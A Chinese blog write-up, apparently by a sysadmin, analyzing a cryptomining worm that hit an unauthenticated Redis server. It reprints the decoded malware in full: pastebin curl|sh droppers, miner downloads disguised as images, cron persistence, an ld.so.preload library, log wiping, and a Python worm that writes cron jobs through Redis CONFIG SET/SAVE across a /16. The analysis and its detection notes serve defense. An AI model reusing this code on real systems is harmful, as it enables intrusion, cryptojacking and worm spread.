
针对Redis默认端口的挖矿脚本分析

起因



这被入侵的机子,就是没有设密码的Redis,被搞了一波。

跟踪记录流水账

阿里云这张截图给出的命令行参数

/bin/sh -c /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh


直接看看这个链接的内容

jane@debian:~$ curl https://pastebin.com/raw/xbY7p5Tb
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash

继续跟踪链接

curl https://pastebin.com/raw/uuYVPLXd

省略一堆经过base64编码的内容

解码一下

curl https://pastebin.com/raw/uuYVPLXd | base64 -d

#!/bin/bash
# First-stage dropper, decoded from pastebin raw/uuYVPLXd (base64).
# Everything below runs as root via the cron entries it installs.  A fixed
# SHELL and PATH are exported first, presumably so the cron-launched copies
# behave the same regardless of the victim's environment (unverified).
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

#######################################
# "Kill competitors" routine.  Terminates other cryptominers / bot
# components by name, by command line and by network endpoint, and deletes
# their files, so this family has the CPU to itself.  No exit status is
# checked; every failure is ignored.
# Detection value: the names, paths, pool hosts and ports matched here are
# indicators of *other* families that may also be present on the host.
#######################################
function kills() {
  # Two named rivals: sourplum, and wnTKYg with its ddg restarter (the
  # writeup says ddg restarts wnTKYg when it dies).  'ddg*' is unquoted, so
  # if a file matching ddg* exists in the current directory the shell
  # expands it before pkill sees the pattern.
  pkill -f sourplum
  pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg


  # Leftovers of other campaigns, including two names under /boot/grub.
  rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
  rm -rf /tmp/*index_bak*
  rm -rf /tmp/*httpd.conf*
  rm -rf /tmp/*httpd.conf
  rm -rf /tmp/a7b104c270


  # Kill by command line: every process whose ps line mentions a rival
  # Monero pool, the xmrig binaries or the path above.  'grep -v grep'
  # drops the pipeline itself.  When nothing matches, GNU xargs (no -r)
  # still runs 'kill -9' once with no PID, which only yields a usage error.
  ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmrig" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmrigDaemon" | awk '{print $2}' | xargs kill -9
  ps auxf | grep -v grep | grep "xmrigMiner" | awk '{print $2}' | xargs kill -9



  # Kill by name.  pkill -f matches the full command line, so the entries
  # that borrow real daemon names (irqbalance, polkitd, acpid) also kill
  # the genuine services when they are running -- visible to a defender as
  # unexplained service deaths.  'minerd' and 'sourplum' appear twice.
  pkill -f biosetjenkins
  pkill -f AnXqV.yam
  pkill -f xmrigDaemon
  pkill -f xmrigMiner
  pkill -f xmrig
  pkill -f Loopback
  pkill -f apaceha
  pkill -f cryptonight
  pkill -f stratum
  pkill -f mixnerdx
  pkill -f performedl
  pkill -f JnKihGjn
  pkill -f irqba2anc1
  pkill -f irqba5xnc1
  pkill -f irqbnc1
  pkill -f ir29xc1
  pkill -f conns
  pkill -f irqbalance
  pkill -f crypto-pool
  pkill -f minexmr
  pkill -f XJnRj
  pkill -f NXLAi
  pkill -f BI5zj
  pkill -f askdljlqw
  pkill -f minerd
  pkill -f minergate
  pkill -f Guard.sh
  pkill -f ysaydh
  pkill -f bonns
  pkill -f donns
  pkill -f kxjd
  pkill -f Duck.sh
  pkill -f bonn.sh
  pkill -f conn.sh
  pkill -f kworker34
  pkill -f kw.sh
  pkill -f pro.sh
  pkill -f polkitd
  pkill -f acpid
  pkill -f icb5o
  pkill -f nopxi
  pkill -f irqbalanc1
  pkill -f minerd
  pkill -f i586
  pkill -f gddr
  pkill -f mstxmr
  pkill -f ddg.2011
  pkill -f wnTKYg
  pkill -f deamon
  pkill -f disk_genius
  pkill -f sourplum
  pkill -f bashx
  pkill -f bashg
  pkill -f bashe
  pkill -f bashf
  pkill -f bashh
  pkill -f XbashY
  pkill -f libapache



  # Delete rival drop files.  The last line also removes THIS family's own
  # /tmp/kworkerds, /bin/kworkerds and /bin/config.json; downloadrun /
  # downloadrunxm re-fetch them later when they are missing.
  rm -rf /tmp/httpd.conf
  rm -rf /tmp/conn
  rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
  rm -rf /tmp/conns
  rm -f /tmp/irq.sh
  rm -f /tmp/irqbalanc1
  rm -f /tmp/irq
  rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json


  # Kill by connection: column 7 of 'netstat -anp' is PID/Program, so awk
  # $7 split on '/' yields the PID.  grep runs over the whole line, so a
  # bare '3333' also matches any address, port or PID containing that
  # digit string.
  netstat -anp | grep 69.28.55.86:443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 14444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  netstat -anp | grep 5.196.225.222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9



  # If no kworkerds process is running, free port 13531 -- the pool port
  # of this family's own miner (see the config.json quoted later in the
  # writeup) -- by killing whatever currently owns a connection on it.
  y=$(ps aux | grep -v grep | grep kworkerds | wc -l)

  if [ ${y} -eq 0 ]; then
    netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
  fi



}

#######################################
# Installs the third-stage script as /bin/httpdns and hooks it into
# /etc/crontab.  pastebin raw/698D7kZU is itself a curl|base64 -d|bash
# one-liner; its decoded result is shown later in the writeup.  Only runs
# when /bin/httpdns is absent.
# Side effects: /bin/httpdns (mode 755); sed '$d' deletes the LAST line of
# /etc/crontab before the new entry is appended, so a legitimate final
# entry is silently lost.  "* */6 * * *" is every minute of every sixth
# hour, not every six hours.
# Detection: /bin/httpdns; an /etc/crontab line "root /bin/sh /bin/httpdns".
#######################################
function system() {
  if [ ! -f "/bin/httpdns" ]; then
    # curl first; wget only if the file still does not exist afterwards.
    curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
    if [ ! -f "/bin/httpdns" ]; then
      wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
    fi
    sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
  fi

}

#######################################
# Userland rootkit install plus log wiping.  Drops a shared object served
# as a .jpg from thyrsi.com to /usr/local/lib/libntp.so and lists it in
# /etc/ld.so.preload, so the dynamic loader maps it into every dynamically
# linked program started from then on.  What the library does is not
# shown in the writeup (presumably it hides the miner -- unverified).
# The function name shadows the 'top' command inside this script only.
# Side effects: /etc/ld.so.preload created, or its last line replaced;
# atime/mtime of the dropped files copied from /bin/sh; root's mail
# spool, wtmp, secure and cron logs truncated to empty.
# Detection: a non-empty /etc/ld.so.preload; files under /usr/local/lib
# whose mtime equals /bin/sh's; an empty /var/log/wtmp on a live server.
#######################################
function top() {
  if [ ! -f "/usr/local/lib/libntp.so" ]; then
    curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
    if [ ! -f "/usr/local/lib/libntp.so" ]; then
      wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
    fi
  fi
  # An existing preload file (another family's, or a legitimate one) has
  # its last line replaced rather than appended to.
  if [ ! -f "/etc/ld.so.preload" ]; then
    echo /usr/local/lib/libntp.so >/etc/ld.so.preload
  else
    sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >>/etc/ld.so.preload
  fi


  # Timestomping: -a/-m copy access and modification time from the -r
  # reference /bin/sh; -c avoids creating a missing file.  libjdk.so is
  # touched here but never dropped by this script.
  touch -acmr /bin/sh /etc/ld.so.preload
  touch -acmr /bin/sh /usr/local/lib/libjdk.so
  touch -acmr /bin/sh /usr/local/lib/libntp.so


  # Log wiping.  '0>file' is parsed as a redirection of fd 0, so echo gets
  # no argument and prints a bare newline to stdout -- but the open with
  # truncation still empties each file.
  echo 0>/var/spool/mail/root # mail spool
  echo 0>/var/log/wtmp # login records
  echo 0>/var/log/secure # authentication records
  echo 0>/var/log/cron # cron log
}

#######################################
# Worm stage.  Starts the system python detached (nohup, output discarded,
# backgrounded) with a base64 one-liner; the decoded loader (shown later
# in the writeup) fetches pastebin raw/nYBpuAxT, decodes it and exec()s
# it -- the Redis 6379 scanner.  nohup execs the interpreter found on PATH,
# so the 'python' shell function defined here is not re-entered.
# /tmp/.tmpa is the once-only marker the entry point checks.
# Detection: a long-lived "python -c import base64;exec(...)" process,
# /tmp/.tmpa, many outbound connections to neighbouring hosts on 6379.
#######################################
function python() {
  nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
  touch /tmp/.tmpa
}

#######################################
# Cron persistence.  Writes the same pastebin downloader one-liner into
# three cron locations (system cron.d, root's spool entry, and the
# crontabs/ layout used by other distributions) so at least one is
# honoured, then copies /bin/sh's timestamps onto all of them.
# Schedules: every 10 min, every 30 min, and every minute of every 10th
# hour; each file ends with a "##" line.  The cron.d entry first re-chmods
# /usr/bin/curl to 755, undoing the common hardening of removing curl's
# execute bit.  Existing files are overwritten (>), not appended to.
# Detection: /etc/cron.d/root, /var/spool/cron/root and
# /var/spool/cron/crontabs/root referencing pastebin.com/raw/xbY7p5Tb;
# cron files whose mtime equals /bin/sh's.
#######################################
function echocron() {
  echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
  echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
  mkdir -p /var/spool/cron/crontabs
  echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root

  # Timestomp: -a/-m copy times from the -r reference /bin/sh.
  touch -acmr /bin/sh /etc/cron.d/root
  touch -acmr /bin/sh /var/spool/cron/crontabs
  touch -acmr /bin/sh /var/spool/cron/root
  touch -acmr /bin/sh /var/spool/cron/crontabs/root

}

#######################################
# Miner stage 1.  If 'netstat -anp' shows no line containing "13531" (the
# pool port of this family's miner; a substring match over whole lines),
# fetch the miner disguised as a .jpg on thyrsi.com to /tmp/kworkerds
# (curl, wget as fallback) and start it detached.  The writeup's container
# run of this binary shows it logging into a mining pool.
# Both branches end in the same nohup line; the else branch is redundant.
# '$ps' is an ordinary variable here, not the ps command.
# Detection: /tmp/kworkerds, a process of that name, outbound traffic to
# xmr.f2pool.com:13531.
#######################################
function downloadrun() {
  ps=$(netstat -anp | grep 13531 | wc -l)
  if [ ${ps} -eq 0 ]; then
    if [ ! -f "/tmp/kworkerds" ]; then
      curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
      if [ ! -f "/tmp/kworkerds" ]; then
        wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
      fi
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    else
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    fi
  fi
}

#######################################
# Miner stage 2, tried by the entry point only if port 13531 is still
# unused ten seconds after stage 1.  Drops /bin/config.json (a miner
# configuration; the writeup quotes its pool entry
# "stratum+tcp://xmr.f2pool.com:13531") and a second binary,
# /bin/kworkerds (a different download than /tmp/kworkerds), then starts
# the latter detached.  chmod +x on a JSON file has no effect of note.
# Detection: /bin/config.json and /bin/kworkerds -- files in /bin that
# belong to no package.
#######################################
function downloadrunxm() {
  pm=$(netstat -anp | grep 13531 | wc -l)
  if [ ${pm} -eq 0 ]; then
    if [ ! -f "/bin/config.json" ]; then
      curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
      if [ ! -f "/bin/config.json" ]; then
        wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
      fi
    fi
    if [ ! -f "/bin/kworkerds" ]; then
      curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
      if [ ! -f "/bin/kworkerds" ]; then
        wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
      fi
      nohup /bin/kworkerds >/dev/null 2>&1 &
    else
      nohup /bin/kworkerds >/dev/null 2>&1 &
    fi
  fi
}

# Entry point.  pastebin raw/C4ZhQFrH acts as a remote switch: if it
# returns the text "update", the dropped binaries are wiped and only cron
# is re-armed (the next cron run then fetches whatever is current);
# otherwise the full chain runs.  The writeup observed it returning
# "noupdate".  The 'x' suffix keeps the test valid when curl fails and
# $update is empty ("x" vs "updatex" -> false -> full chain).
update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)

if [ ${update}x = "update"x ]; then
  rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
  echocron
else
  # First run only: the python function creates /tmp/.tmpa, so the Redis
  # worm is launched once per host.
  if [ ! -f "/tmp/.tmpa" ]; then
    rm -rf /tmp/.tmp
    python
  fi
  kills          # remove competing miners
  downloadrun    # /tmp/kworkerds
  echocron       # cron persistence
  system         # /bin/httpdns + /etc/crontab
  top            # the shell function above (ld.so.preload, log wipe), not /usr/bin/top
  sleep 10
  # Give the miner ten seconds to connect; if port 13531 is still unused,
  # fall back to the /bin variant.
  port=$(netstat -anp | grep 13531 | wc -l)
  if [ ${port} -eq 0 ]; then
    downloadrunxm
  fi
fi
#
#�

function有点多,用Atom折叠下。


update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)

if [ ${update}x = "update"x ]; then
  rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
  echocron
else
  .
  .
  .
fi  

脚本执行的第一步就是根据update返回值确定是不是要更新。

现在我这个时间点去访问,是noupdate

curl https://pastebin.com/raw/C4ZhQFrH

noupdate

rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds

用脚都能够猜得出这些文件有问题,挖矿脚本需要更新的东西还能是啥子。

看看这个echocron的function干了啥

#######################################
# Cron persistence (quoted from the listing above).  The same pastebin
# downloader is written to three cron locations -- every 10 min, every
# 30 min, and every minute of every 10th hour -- and each file then gets
# /bin/sh's timestamps via touch -r.  The cron.d entry re-chmods
# /usr/bin/curl to 755 before using it.
#######################################
function echocron() {
  echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
  echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
  mkdir -p /var/spool/cron/crontabs
  echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root

  # Timestomp the four paths so mtime-based searches miss them.
  touch -acmr /bin/sh /etc/cron.d/root
  touch -acmr /bin/sh /var/spool/cron/crontabs
  touch -acmr /bin/sh /var/spool/cron/root
  touch -acmr /bin/sh /var/spool/cron/crontabs/root

}

这个意图就非常之明显啦,添加定时任务到系统里面,让这挖矿生生不息。

留意一下,这个获取脚本的地址,恰好不就是现在分析的这个脚本咩。

/etc/cron.d/root
/var/spool/cron/root
/var/spool/cron/crontabs
/var/spool/cron/crontabs/root

上面的文件还使用touch -acmr改掉了时间,改成跟sh一个时间,怕是防止运维用find找出来吧。


# First-run guard from the entry point: the python function creates
# /tmp/.tmpa, so the Redis worm is launched only once per host.
if [ ! -f "/tmp/.tmpa" ]; then
  rm -rf /tmp/.tmp
  python
fi

判断有没有/tmp/.tmpa,没有就删掉/tmp/.tmp,再调用python这个function。

怀疑.tmp对于apache有较大影响。

#######################################
# Worm launcher (quoted from the listing above): runs the system python
# detached with a base64 one-liner whose decoded form follows in the
# writeup, then drops the /tmp/.tmpa marker.
#######################################
function python() {
  nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
  touch /tmp/.tmpa
}

这个/tmp/.tmpa,应该就是判定有没有运行过这个python脚本的了。

现在看看这个python脚本运行的是啥子

先做一次base64解码

#coding: utf-8
# Loader run by the bash 'python' function.  Fetches pastebin raw/nYBpuAxT,
# base64-decodes the body and exec()s it in this process (urllib.urlopen
# marks this as Python 2).  Any error is swallowed, so a failed fetch
# leaves no trace.
import urllib
import base64

d= 'https://pastebin.com/raw/nYBpuAxT'
try:
    page=base64.b64decode(urllib.urlopen(d).read())
    exec(page)
except:
    pass
curl https://pastebin.com/raw/nYBpuAxT | base64 -d

实际上他要运行的脚本就是这个

#! /usr/bin/env python
#coding: utf-8
# Redis-spreading worm (decoded from pastebin raw/nYBpuAxT).  The
# urllib/httplib imports mark it as Python 2.  It learns the victim's own
# public IPv4, expands the first two octets to a /16, and tries to write
# a cron line into every unauthenticated Redis on port 6379 it can reach,
# so each new victim fetches the same dropper.

import threading
import socket
from re import findall
import httplib

# Module-level target list: filled in place by get_ip_list(), walked by
# runPortscan().
IP_LIST = []

class scanner(threading.Thread):
    # One thread per target host.  All bookkeeping is CLASS-level and
    # therefore shared by every instance: tlist (live threads),
    # maxthreads (concurrency cap), evnt (pulsed when a slot frees),
    # lck (guards tlist).
    tlist = []
    maxthreads = 100
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        # host: dotted IPv4 string produced by get_ip_list().
        threading.Thread.__init__(self)
        self.host = host
    def run(self):
        # Connects to Redis' default port 6379 with no authentication and
        # sends four raw commands without reading any reply: SET a key
        # whose value is a crontab line fetching the pastebin dropper,
        # CONFIG SET the dump directory to /etc/cron.d and the dump
        # filename to 'root', then SAVE -- the RDB dump is thereby written
        # as /etc/cron.d/root and cron picks the line out of it.  Any
        # failure (closed port, AUTH required, protected mode, timeout)
        # is silently swallowed.
        # Defensive takeaway: requirepass / protected-mode, binding to
        # localhost, renaming CONFIG, and running redis as an unprivileged
        # user that cannot write /etc/cron.d each break this.
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((self.host, 6379))
            s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
            s.send('config set dir /etc/cron.d\r\n')
            s.send('config set dbfilename root\r\n')
            s.send('save\r\n')
            s.close()
        except Exception:
            pass
        # Deregister and, if a slot is now free, pulse the event.  set()
        # immediately followed by clear() only wakes a thread already
        # blocked in evnt.wait(); a producer that has not reached wait()
        # yet misses the pulse (see runPortscan).
        scanner.lck.acquire()
        scanner.tlist.remove(self)
        if len(scanner.tlist) < scanner.maxthreads:
            scanner.evnt.set()
            scanner.evnt.clear()
        scanner.lck.release()

    def newthread(host):
        # Static factory: register the new thread under the lock, then
        # start it.
        scanner.lck.acquire()
        sc = scanner(host)
        scanner.tlist.append(sc)
        scanner.lck.release()
        sc.start()

    # Python 2 style explicit staticmethod (no decorator).
    newthread = staticmethod(newthread)

def get_ip_list():
    # Learns the host's own public IPv4 from ident.me (plain HTTP) and
    # expands it to a /16 of targets appended to the global IP_LIST.
    # The regex's unescaped '.' matches any character and [0] keeps the
    # first match, e.g. "1.2." for "1.2.3.4"; the two range(0, 255) loops
    # stop at 254, so the .255 hosts are skipped.  Any exception (no
    # network, unexpected body) leaves IP_LIST empty and the scan becomes
    # a no-op.  conn.request() returns None, so 'req' is never used.
    # Net effect: the worm probes the network neighbourhood of the
    # victim's public address.
    try:
        url = 'ident.me'
        conn = httplib.HTTPConnection(url, port=80, timeout=10)
        req = conn.request(method='GET', url='/', )
        result = conn.getresponse()
        ip2 = result.read()
        ips2 = findall(r'\d+.\d+.', ip2)[0]
        for i in range(0, 255):
            ip_list1 = (ips2 + (str(i)))
            for g in range(0, 255):
                IP_LIST.append(ip_list1 + '.' + (str(g)))
    except Exception:
        pass

def runPortscan():
    # Drives the scan: builds the target list, then spawns one scanner
    # per host, blocking on evnt whenever maxthreads are alive.
    # NOTE: the lock is released before evnt.wait() and run() only pulses
    # the event, so a thread that finishes in between is missed and the
    # producer may stay blocked until the next completion.  The final
    # join iterates scanner.tlist while workers remove themselves from
    # it, which can skip entries; nothing depends on the result, so the
    # script tolerates it.
    get_ip_list()
    for host in IP_LIST:
        scanner.lck.acquire()
        if len(scanner.tlist) >= scanner.maxthreads:
            scanner.lck.release()
            scanner.evnt.wait()
        else:
            scanner.lck.release()
        scanner.newthread(host)
    for t in scanner.tlist:
        t.join()

# Entry point.  The loader exec()s this text inside a 'python -c' process,
# whose __name__ is "__main__", so the guard is satisfied there as well.
if __name__ == "__main__":
    runPortscan()

粗略地看了两下,就是一个扫Redis默认端口并且传播挖矿脚本的操作。

这被入侵的机子,就是没有设密码的Redis,被搞了一波。

# Excerpt of scanner.run() and get_ip_list() from the worm above, quoted
# for discussion; not runnable on its own (self.host is undefined here).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((self.host, 6379))  # Redis default port, no AUTH attempted
# The key value is a crontab line; CONFIG SET dir/dbfilename aim the RDB
# dump at /etc/cron.d/root and SAVE writes it.  Replies are never read.
s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /etc/cron.d\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
# Own public IP from ident.me; the regex keeps the first two octets
# ("a.b." for "a.b.c.d") and the nested range(0, 255) loops (0..254)
# build the /16 of targets.
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
req = conn.request(method='GET', url='/', )
result = conn.getresponse()
ip2 = result.read()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
    ip_list1 = (ips2 + (str(i)))
    for g in range(0, 255):
        IP_LIST.append(ip_list1 + '.' + (str(g)))

继续往下看

# Else branch of the entry point (the normal run): competitor cleanup,
# miner, cron persistence, /bin/httpdns, rootkit + log wipe, then a
# ten-second wait before checking whether the miner's pool port 13531 is
# in use; if not, the /bin variant is tried.
kills
downloadrun
echocron
system
top            # the shell function defined above, not /usr/bin/top
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ]; then
  downloadrunxm
fi

看看这个kills的function干了啥

开始的两行就很interesting了,先把同行的挖矿给干了。

# Opening lines of kills(): remove two rival miners (sourplum; wnTKYg and
# its ddg restarter) and their /tmp files.  'ddg*' is an unquoted glob.
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg

第一行是干掉sourplum

第二行是干掉wnTKYg,ddg这个是帮他死掉后重启的。

# File cleanup from kills(): two names under /boot/grub whose purpose the
# writeup could not determine, glob patterns for httpd.conf / index backup
# files under /tmp, and /tmp/a7b104c270 (a rival miner per the writeup).
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270

不清楚第一行的删除有什么用,但是涉及到/boot的东西,估计都蛋疼。

后几行都是删掉了apache的备份。

最后一行,a7b104c270,这个是挖矿的。

整个kill的function看下来,都是针对于apache和挖矿恶意程序。

跟这次比较相关就下面这些

# The lines of kills() that concern this family itself: its own drop files
# are removed (re-fetched later by downloadrun / downloadrunxm), and if no
# kworkerds process is running, whatever owns a connection on port 13531
# -- the miner's pool port -- is killed so the port is free for it.
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json

y=$(ps aux | grep -v grep | grep kworkerds | wc -l)

if [ ${y} -eq 0 ]; then
  netstat -anp | grep 13531 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs kill -9
fi

从这几行基本可以判定,kworkerds这就是他的挖矿程序。

要是13531这个端口被占用,又不是这个kworkerds,就kill掉,腾出来给他挖矿用。

把后面遇到的config.json拿到这里来,就很清晰了。

"url": "stratum+tcp://xmr.f2pool.com:13531",

看看这个downloadrun的function干了啥

#######################################
# Miner stage 1 (quoted from the listing above).  When no netstat line
# contains "13531", fetch the miner -- served as a .jpg from the image
# host thyrsi.com -- to /tmp/kworkerds (curl, then wget) and start it
# detached.  Both branches run the same nohup line.
#######################################
function downloadrun() {
  ps=$(netstat -anp | grep 13531 | wc -l)
  if [ ${ps} -eq 0 ]; then
    if [ ! -f "/tmp/kworkerds" ]; then
      curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
      if [ ! -f "/tmp/kworkerds" ]; then
        wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
      fi
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    else
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    fi
  fi
}

thyrsi.com,一个图床站。

这里稍微做了下伪装。

kworkerds下到/tmp,并且运行。

这个下载链接在国内速度真是好差,这可能就是为啥在这次入侵的机子上面找不到这个程序的问题emmm。

但是在海外下载是没有问题的。

root@659b8ee8ecf6:/# chmod 777 kworkerds
root@659b8ee8ecf6:/# ./kworkerds
[2018-09-03 18:31:58] : Autoconf L3 size detected at 3072 KB.
[2018-09-03 18:31:58] : Autoconf core count detected as 2 on Linux.
[2018-09-03 18:31:58] : Starting 1x thread, affinity: 0.
[2018-09-03 18:31:58] : Starting 1x thread, affinity: 1.
[2018-09-03 18:31:59] : Dev pool connected. Logging in...
[2018-09-03 18:32:01] : Pool logged in.

在容器上面跑了一下,确实的一个挖矿的程序。CPU一下子就上天了。

docker diff debian

C /tmp
A /tmp/.systemd-private-23024397a2adb34112feb510f90ad653.service-3vFbca
A /tmp/.systemd-private-45a30b14252fad11672e49bbbda5c08f.service-5qFboa
A /tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa
A /kworkerds

在输出的文件里面/tmp/.systemd-private-763627b1e954c446de5d9b0d2afbfe46.service-xcfboa

"pool_list" :
[
	{"pool_address" : "xmr.f2pool.com:13531",
    "wallet_address" : "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.bashx",
    "rig_id" : "",
    "pool_password" : "",
    "use_nicehash" : false,
    "use_tls" : false,
    "tls_fingerprint" : "",
    "pool_weight" : 1
    },
],

这个应该是一个已经封装好挖矿程序(挖矿的地址和矿池都写好了),开箱即用。2333

哪怕没有下载后面的config.json都能够跑。



看看这个system的function干了啥

#######################################
# Third-stage installer (quoted from the listing above): drops
# /bin/httpdns from pastebin raw/698D7kZU (mode 755) and, after deleting
# the last line of /etc/crontab, appends "* */6 * * * root /bin/sh
# /bin/httpdns" -- every minute of every sixth hour.
